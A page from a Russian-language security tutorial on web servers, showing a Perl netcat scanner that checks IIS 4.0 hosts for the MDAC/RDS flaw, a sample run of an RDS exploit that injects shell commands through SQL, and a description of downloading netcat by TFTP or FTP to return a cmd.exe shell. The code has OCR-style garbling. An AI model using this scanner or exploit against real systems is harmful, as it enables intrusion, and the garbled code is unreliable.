Иллюстрированный самоучитель по Secure Web

         

может быть уязвима против атаки



print OUTFILE "порт 80 открыт\n";

open (HTTP, ">http.tmp");

print HTTP "GET /msadc/msadcs.dll HTTP/1.0\n\n";

close HTTP;

open(SCAN2, "type http.tmp I nc -nvv -w 2 $target 80 2>&1 I");

$result2 = <SCAN2>;

if (Sresult2=~/Microsoft-IIS4.07)

{

if ($result2=~/x-varg/){

print "

$target уязвима против атаки MDAC.";

print OUTFILE "$target

может быть уязвима против атаки &MDAC.";

}

}

close SCAN;

}

}

sub check_end

{

if (($al==$a2) &S ($bl==$b2) &

s ($cl==$c2)) {

$dend=$d2; }

else {

$dend=255; }

if (($al==$a2) &&

($bl==$b2)) {

$cend=$c2; }

else {

$cend=255; }

if ($al= =$a2)

{

$bend=$b2; - }

else {

$bend=255;

}

}

При использовании параметра -n команды netcat требуется, чтобы в командной строке явно указывался IP-адрес

"Анатомия" атаки

Сценарий Perl можно найти на многих Web-узлах, в том числе в архиве NTBugtraq (http://www.ntbugtraq.com) или на узле компании Security Focus (http://www.securityfocus.com). Он работает одинаково эффективно как в системе UNIX, так и в NT, и предпринимает попытку установить связь с компонентами MDAC, чтобы добавить в запрос SQL строку | shell ($command) |. Когда компонент MDAC достигает команды shell, выполняется команда, заданная в переменной $ command. Для того чтобы убедиться в наличии описанной возможности, попробуйте запустить команду со следующим синтаксисом.

C:\>perl mdac_exploit.pl -h 192.168.50.11

-- RDS exploit by rain forest puppy/ADM/Wiretrip--

Command: <run your command here>

Step 1: Trying raw driver to btcustmr.mdb

winnt -> c: Success!

Разработка корректной команды для системы NT — непростая задача. Сомил Шах (Somil Shah) и Нитеш Даньяни (Nitesh Dhanjani) вместе с Джорджем Куртцом (George Kurtz) разработали интересную последовательность команд, которые можно загрузить с помощью TFTP или по FTP. В результате будет загружена и запущена утилита netcat, возвращающая обратно командную оболочку системы NT (cmd.exe). Например, с использованием средств FTP можно воспользоваться следующей последовательностью команд,

Содержание  Назад  Вперед